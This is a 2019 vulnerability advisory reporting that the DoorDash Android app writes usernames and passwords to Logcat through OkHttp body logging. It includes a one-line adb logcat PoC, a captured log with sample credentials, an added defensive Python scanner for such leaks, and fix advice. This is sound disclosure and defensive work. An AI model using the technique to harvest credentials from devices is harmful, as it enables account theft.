friendlyjlee

Security Problem in DoorDash Android App

Oct 7th, 2019
# Exploit Title: DoorDash Android App - Username/Password Logging
# Application: DoorDash
# Version: 11.0.2 ~ 11.5.2 (every version we tested has this problem)
# Software Link: https://play.google.com/store/apps/details?id=com.dd.doordash
# Company: DoorDash
# Installs: 10,000,000+ (#1 in food category in Google Play)
# Impact: Anyone who can read Logcat output can obtain DoorDash usernames and passwords
# Category: Mobile Apps
# Tested on: Android 9

---Description---
Usernames and passwords are written to the system log during authentication, so an attacker who can read Logcat can obtain a DoorDash user's password and ID. On Android versions before Jelly Bean, any installed app could read Logcat without any permission.

---Vendor feedback---
We have reported this issue, and they will fix it soon.

---PoC---
1. Log in with the DoorDash Android app.
- Open the login screen.
- Enter credentials. Fake values are enough to reproduce the problem.

2. Search Logcat for the password:
$ adb logcat | grep 'OkHttp'

10-07 16:09:34.498 10066 10201 D OkHttp : --> POST https://api.doordash.com/v2/auth/token/
10-07 16:09:34.498 10066 10201 D OkHttp : Content-Type: application/json; charset=UTF-8
10-07 16:09:34.498 10066 10201 D OkHttp : Content-Length: 109
10-07 16:09:34.498 10066 10201 D OkHttp : X-NewRelic-ID: XAUEWF5SGwEJUFhUDwcA
10-07 16:09:34.498 10066 10201 D OkHttp : {"client_id":"6086ebcbfb859ee3","email":"jaeho.lee@rice.edu","is_manual":true,"password":"MyPasswordIsHere!"}
10-07 16:09:34.498 10066 10201 D OkHttp : --> END POST (109-byte body)
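The PoC above relies on reading the log by eye. As an added example (not part of the original advisory, and not DoorDash code), the script below automates that check from the defender's side: it parses `adb logcat -v threadtime` output, keeps track of the most recent `-->`/`<--` request or response header printed by the OkHttp tag, and flags any JSON body that carries a credential-like field, so a release build can be tested for this class of leak before shipping. The log sample, the host `api.example.test`, the client id and the credentials in it are constructed for illustration; the list of sensitive key names is an assumption you should extend for your own API.

```python
import json
import re
import sys

# Constructed sample of `adb logcat -v threadtime` output, modelled on the
# format of OkHttp's logging interceptor. Host, pid/tid, client_id and the
# credentials are made up; nothing here comes from a real device.
SAMPLE_LOGCAT = """\
10-07 16:09:34.498 10066 10201 D OkHttp : --> POST https://api.example.test/v2/auth/token/
10-07 16:09:34.498 10066 10201 D OkHttp : Content-Type: application/json; charset=UTF-8
10-07 16:09:34.498 10066 10201 D OkHttp : Content-Length: 99
10-07 16:09:34.498 10066 10201 D OkHttp : {"client_id":"0123456789abcdef","email":"user@example.test","is_manual":true,"password":"hunter2!"}
10-07 16:09:34.498 10066 10201 D OkHttp : --> END POST (99-byte body)
10-07 16:09:35.102 10066 10201 D OkHttp : <-- 200 https://api.example.test/v2/auth/token/ (604ms)
10-07 16:09:35.102 10066 10201 D OkHttp : {"token":"eyJhbGciOiJIUzI1NiJ9.constructed.signature"}
10-07 16:09:35.102 10066 10201 D OkHttp : <-- END HTTP (54-byte body)
10-07 16:09:36.000 10066 10201 D OkHttp : --> GET https://api.example.test/v2/consumer/me/
10-07 16:09:36.000 10066 10201 D OkHttp : --> END GET
"""

# threadtime line: "MM-DD HH:MM:SS.mmm PID TID LEVEL TAG : message"
LOGCAT_RE = re.compile(
    r"^(?P<ts>\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3})\s+(?P<pid>\d+)\s+(?P<tid>\d+)\s+"
    r"(?P<level>[VDIWEF])\s+(?P<tag>\S+)\s*:\s(?P<msg>.*)$"
)
# Require a URL so that "--> END POST" / "<-- END HTTP" markers do not match.
REQUEST_RE = re.compile(r"^--> (?P<method>[A-Z]+) (?P<url>https?://\S+)")
RESPONSE_RE = re.compile(r"^<-- (?P<status>\d{3}) (?P<url>https?://\S+)")

# Assumed list of field names that should never appear in a log line.
SENSITIVE_KEYS = {
    "password", "passwd", "pass", "secret", "token",
    "access_token", "refresh_token", "authorization",
}


def find_sensitive_keys(obj, prefix=""):
    """Recursively collect dotted paths of JSON keys whose name suggests a credential."""
    found = []
    if isinstance(obj, dict):
        for k, v in obj.items():
            path = f"{prefix}.{k}" if prefix else k
            if k.lower() in SENSITIVE_KEYS and v not in (None, ""):
                found.append(path)
            found.extend(find_sensitive_keys(v, path))
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            found.extend(find_sensitive_keys(v, f"{prefix}[{i}]"))
    return found


def scan_logcat(text):
    """Return one finding per logged HTTP body that carries a credential-like field.

    OkHttp prints the body on its own line without repeating the URL, so the
    URL and direction are taken from the last '-->'/'<--' header line seen on
    the same pid/tid.
    """
    findings = []
    context = {}  # (pid, tid) -> {"direction", "url"} of the exchange in progress
    for line in text.splitlines():
        m = LOGCAT_RE.match(line)
        if not m:
            continue
        msg, key = m["msg"], (m["pid"], m["tid"])
        req, resp = REQUEST_RE.match(msg), RESPONSE_RE.match(msg)
        if req:
            context[key] = {"direction": "request", "url": req["url"]}
            continue
        if resp:
            context[key] = {"direction": "response", "url": resp["url"]}
            continue
        if not msg.startswith(("{", "[")):
            continue  # header lines, END markers, non-JSON bodies
        try:
            body = json.loads(msg)
        except ValueError:
            continue
        keys = find_sensitive_keys(body)
        if keys:
            ctx = context.get(key, {"direction": "unknown", "url": "?"})
            findings.append({"ts": m["ts"], "direction": ctx["direction"],
                             "url": ctx["url"], "keys": keys})
    return findings


if __name__ == "__main__":
    # Pipe a live capture in with: adb logcat -v threadtime | python3 scan.py -
    text = sys.stdin.read() if len(sys.argv) > 1 and sys.argv[1] == "-" else SAMPLE_LOGCAT
    for f in scan_logcat(text):
        print(f"{f['ts']} {f['direction']:8} {f['url']} leaks {', '.join(f['keys'])}")
```

On the constructed sample this reports the login request (field `password`) and the token response (field `token`). The `--> POST ... --> END POST (n-byte body)` framing in the advisory's capture is the output format of OkHttp's `HttpLoggingInterceptor` at `Level.BODY`; the fix belongs in the app rather than in the log reader: leave the interceptor out of release builds, or drop it to `Level.BASIC`/`Level.NONE`, and redact sensitive headers such as `Authorization` wherever request logging is kept for debugging.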
---Reporter---
Jaeho Lee (Jaeho.Lee@rice.edu)
Rice Computer Security Lab
Rice University